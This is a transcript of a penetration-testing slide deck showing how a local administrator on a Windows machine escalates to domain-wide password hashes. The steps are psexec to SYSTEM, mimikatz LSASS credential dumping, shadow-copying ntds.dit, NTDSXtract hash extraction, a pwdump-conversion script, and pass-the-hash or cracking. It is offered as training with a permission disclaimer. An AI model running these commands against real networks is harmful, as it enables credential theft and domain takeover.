fall of a domain | from local admin to domain user hashes

Post on 06-May-2015


Author: Riyaz Walikar

TRANSCRIPT

LOCAL ADMIN TO DOMAIN USER HASHES

The Fall of a Domain

Riyaz Walikar

Disclaimer

It was far more painstaking and complicated than this!

Demo setup to show execution path

All the commands were actually used in the pentest

Please do not try this on your office/corporate environment without written permission

Please exercise caution!

The story so far

Remote RDP access to a machine on the client network via VPN

Local Administrator rights to simulate an employee

User is a limited domain user

Domain controller on the same network, reachable with LDAP services running

Visually. This.

Local Admin eh?

Locally logged in as TARDIS\fwhite

Domain limited user but local admin

Other users connected? [Task Manager > Users]

Found another user connected to our system via RDP - sweet! (possibly a domain admin)

Need system privs! Any ideas?

Think Sysinternals!

psexec -s -i cmd.exe

(-s runs the new process as NT AUTHORITY\SYSTEM, -i lets it interact with the desktop)

Dump connected user credentials

mimikatz – Benjamin Delpy

Extracts plaintext passwords from LSASS memory

Wdigest, tspkg, kerberos and many more

mimikatz

privilege::debug

token::elevate

sekurlsa::logonPasswords

Windows (In)Security?

Now what?

http://gapingvoid.com/2008/06/13/now-what/

Remote CMD anyone?

RDP directly!

Lets be discreet

psexec -s -u TARDIS\atomboy \\10.10.10.1 cmd.exe

Game already over!

Instead RDP with user credentials and present report

Lets grab some hashes

Active Directory stores user information in %systemroot%\ntds\ntds.dit

Locked during system usage

ntdsutil + snapshot = backup (Windows Server 2008 and later)

vssadmin create shadow /for=C: (Windows Server 2003 and later)

Lets grab some hashes

backup readable by nt authority\system and administrators

We need the ntds.dit and SYSTEM files

cd, dir and the other cmd.exe built-ins cannot browse an unmounted volume shadow copy

copy works, given the full \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\... path to each file

Core files needed

NTDS.dit structure parse?

NTDSXtract - A framework for offline forensic analysis of ntds.dit

Need the libesedb module as well

libesedb and creddump are in ntds_dump_hash.zip

wget to a linux box (Kali is a good choice)

get framework + compile + make + run

wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip

unzip both

get framework + compile + make + run

cd ntds_dump_hash/libesedb

./configure && make

cd libesedb/esedbtools

./esedbexport -l /tmp/ntds.log <ntds.dit>

(the exported tables land in <ntds.dit>.export/ as datatable.N and link_table.N)

Yay!

python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>

Cleanup the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/master/ntdstopwdump.py)
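What the ntdstopwdump.py clean-up step does, as an added example that is not the original script and not part of the deck: it walks the per-account records that dsusers.py prints, takes the RID from the account SID and the NT and LM hashes from the "Password hashes:" lines, and emits pwdump format (user:rid:lm:nt:::), filling in the well-known empty-password hashes where an account stores no LM or NT hash. The embedded dsusers.py output is a constructed sample and its layout (a "SAM Account name:" line, a "SID:" line, NT hashes prefixed $NT$ in John's style, LM hashes as bare hex) is an assumption about the tool's output; adjust the regex if your dump differs.

```python
import re

# Hashes of the empty password, used when an account stores no LM or NT hash.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in the assumed shape of dsusers.py --passwordhashes output:
# one record per account separated by a blank line, RID = last SID component,
# NT hashes in John's $NT$ form and LM hashes as bare hex, each "account:hash:::".
# 8846f7ea... / e52cac67... are the NT / LM hashes of "password", 0cb69488... the NT hash of "test".
SAMPLE_DSUSERS_OUTPUT = """\
Record ID:           3630
User name:           Administrator
SAM Account name:    Administrator
SID:                 S-1-5-21-1004336348-1177238915-682003330-500
Password hashes:
    Administrator:$NT$8846f7eaee8fb117ad06bdd830b7586c:::
    Administrator:e52cac67419a9a224a3b108f3fa6cb6d:::

Record ID:           3645
User name:           fwhite
SAM Account name:    fwhite
SID:                 S-1-5-21-1004336348-1177238915-682003330-1105
Password hashes:
    fwhite:$NT$8846f7eaee8fb117ad06bdd830b7586c:::

Record ID:           3646
User name:           atomboy
SAM Account name:    atomboy
SID:                 S-1-5-21-1004336348-1177238915-682003330-1106
Password hashes:
    atomboy:$NT$0cb6948805f797bf2a82807973b89537:::
"""

# Indented "account:[$NT$]hexhash:::" line; group 1 present means NT, absent means LM.
HASH_LINE = re.compile(r"\s+[^:]+:(\$NT\$)?([0-9a-fA-F]{32}):::$")


def parse_dsusers(text):
    """Yield (account, rid, lm_hash, nt_hash) for each record in dsusers.py output."""
    for block in re.split(r"\n\s*\n", text.strip()):
        name = sid = lm = nt = None
        for line in block.splitlines():
            if line.startswith("SAM Account name:"):
                name = line.split(":", 1)[1].strip()
            elif line.startswith("SID:"):
                sid = line.split(":", 1)[1].strip()
            else:
                m = HASH_LINE.match(line)
                if m and m.group(1):
                    nt = m.group(2).lower()
                elif m:
                    lm = m.group(2).lower()
        if name is None or sid is None:
            continue   # not an account record
        rid = int(sid.rsplit("-", 1)[1])
        yield name, rid, lm or EMPTY_LM, nt or EMPTY_NT


def to_pwdump(text):
    """pwdump lines (user:rid:lm:nt:::), the format WCE, John and hashcat all accept."""
    return [f"{name}:{rid}:{lm}:{nt}:::" for name, rid, lm, nt in parse_dsusers(text)]


if __name__ == "__main__":
    print("\n".join(to_pwdump(SAMPLE_DSUSERS_OUTPUT)))
```

Accounts with no LM line come out with the empty LM hash, which is what you want: a real LM hash in the dump is itself a finding, since it means LM storage has not been disabled on the domain.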

Now what?

http://gapingvoid.com/2008/06/13/now-what/

Pass the hash / Password Cracking!

Use the Windows Credentials Editor (WCE) - Amplia Security

Password Cracking >> Humla perhaps

References

http://blog.gentilkiwi.com/mimikatz

http://www.ampliasecurity.com/research/wcefaq.html

http://bernardodamele.blogspot.in/2011/12/dump-windows-password-hashes_16.html

Thank you

riyazwalikar@gmail.com

http://www.riyazwalikar.com
